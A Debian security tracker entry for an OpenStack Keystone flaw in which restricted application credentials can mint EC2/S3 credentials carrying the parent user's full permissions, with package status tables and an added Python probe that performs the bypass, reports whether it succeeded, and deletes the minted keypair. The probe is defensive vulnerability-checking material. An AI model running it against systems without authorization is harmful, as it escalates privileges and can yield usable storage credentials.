CVE-2026-33551

Name: CVE-2026-33551
Description: An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected.
Source: CVE
Debian Bugs: 1133118
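
The description above boils down to one API call: a token obtained from a restricted application credential is accepted by the EC2 credential creation endpoint. The probe below, an added example rather than Keystone's or Debian's own code, exercises exactly that call against a deployment you are authorized to test and reports whether it was allowed. It assumes the standard Keystone v3 API shapes (POST /v3/auth/tokens with the "application_credential" identity method, POST /v3/users/{user_id}/credentials/OS-EC2 with a "tenant_id" body, DELETE on the same path to clean up, and the "restricted" flag that Keystone places under token.application_credential in the token response) and the keystoneauth environment variable names OS_AUTH_URL, OS_APPLICATION_CREDENTIAL_ID and OS_APPLICATION_CREDENTIAL_SECRET. Create the application credential with a restricted role set (for example only "reader") before running it; an unrestricted application credential is allowed to create EC2 credentials by design, so the probe refuses to run with one.

```python
#!/usr/bin/env python3
"""Probe for CVE-2026-33551: can a *restricted* application credential mint
an EC2 credential?  Added example; endpoint paths, body shapes and the
"restricted" token field are assumed from the Keystone v3 API."""
import json
import os
import sys
import urllib.error
import urllib.request


def build_app_cred_auth(app_cred_id, app_cred_secret):
    """Keystone v3 token request authenticating with an application credential
    (POST /v3/auth/tokens, identity method "application_credential")."""
    return {
        "auth": {
            "identity": {
                "methods": ["application_credential"],
                "application_credential": {"id": app_cred_id, "secret": app_cred_secret},
            }
        }
    }


def token_is_restricted(token_body):
    """True when the token was issued to a restricted application credential.
    Assumption: Keystone reports this as token.application_credential.restricted
    (restricted is the default when the flag is absent)."""
    app = token_body.get("token", {}).get("application_credential")
    return bool(app) and bool(app.get("restricted", True))


def build_ec2_request(project_id):
    """Body for POST /v3/users/{user_id}/credentials/OS-EC2 (assumed shape)."""
    return {"tenant_id": project_id}


def classify(status):
    """Verdict from the HTTP status of the EC2 credential creation attempt."""
    if status == 201:
        return "AFFECTED"        # restricted app credential obtained an EC2 keypair
    if status == 403:
        return "NOT AFFECTED"    # policy refused the restricted credential
    return "INCONCLUSIVE"        # auth problem, wrong URL, server error, ...


def post_json(url, body, token=None):
    """POST a JSON body; return (status, headers, parsed body or {})."""
    data = json.dumps(body).encode()
    req = urllib.request.Request(url, data=data, method="POST",
                                 headers={"Content-Type": "application/json"})
    if token:
        req.add_header("X-Auth-Token", token)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            raw = resp.read()
            return resp.status, resp.headers, (json.loads(raw) if raw else {})
    except urllib.error.HTTPError as err:
        return err.code, err.headers, {}


def run_check(auth_url, app_cred_id, app_cred_secret):
    """Authenticate with the application credential, then try to create an EC2
    credential for the parent user in the scoped project."""
    base = auth_url.rstrip("/")
    status, headers, body = post_json(base + "/auth/tokens",
                                      build_app_cred_auth(app_cred_id, app_cred_secret))
    if status != 201:
        raise SystemExit(f"authentication failed: HTTP {status}")
    if not token_is_restricted(body):
        raise SystemExit("application credential is unrestricted; the probe is meaningless")
    token = headers["X-Subject-Token"]
    user_id = body["token"]["user"]["id"]
    project_id = body["token"]["project"]["id"]
    status, _, ec2 = post_json(f"{base}/users/{user_id}/credentials/OS-EC2",
                               build_ec2_request(project_id), token)
    verdict = classify(status)
    if status == 201:
        # Remove the keypair we just minted so the probe leaves nothing behind.
        access = ec2["credential"]["access"]
        req = urllib.request.Request(f"{base}/users/{user_id}/credentials/OS-EC2/{access}",
                                     method="DELETE", headers={"X-Auth-Token": token})
        try:
            urllib.request.urlopen(req, timeout=15)
        except urllib.error.HTTPError:
            print(f"warning: could not delete EC2 credential {access}", file=sys.stderr)
    return verdict, status


if __name__ == "__main__":
    verdict, status = run_check(os.environ["OS_AUTH_URL"],
                                os.environ["OS_APPLICATION_CREDENTIAL_ID"],
                                os.environ["OS_APPLICATION_CREDENTIAL_SECRET"])
    print(f"CVE-2026-33551: {verdict} (EC2 credential creation returned HTTP {status})")
```

A 201 from the OS-EC2 endpoint means the restricted credential received an access/secret pair that the s3api middleware will honour with the parent user's Swift permissions; a 403 means the role restriction is enforced at that endpoint. Anything else (for instance a 404 because the OS-EC2 extension is not routed) is reported as inconclusive rather than as a pass.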

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package   Release                         Version              Status
keystone (PTS)   bullseye                        2:18.0.0-3+deb11u1   vulnerable
                 bullseye (security)             2:18.1.0-1+deb11u2   vulnerable
                 bookworm, bookworm (security)   2:22.0.2-0+deb12u1   vulnerable
                 trixie (security), trixie       2:27.0.0-3+deb13u1   vulnerable
                 forky, sid                      2:29.0.1-1           fixed

The information below is based on the following data on fixed versions.

Package    Type     Release      Fixed Version   Urgency   Origin   Debian Bugs
keystone   source   (unstable)   2:29.0.0-2                         1133118

Notes

[trixie] - keystone <no-dsa> (Minor issue)
[bookworm] - keystone <no-dsa> (Minor issue)
https://launchpad.net/bugs/2142138
https://www.openwall.com/lists/oss-security/2026/04/07/12
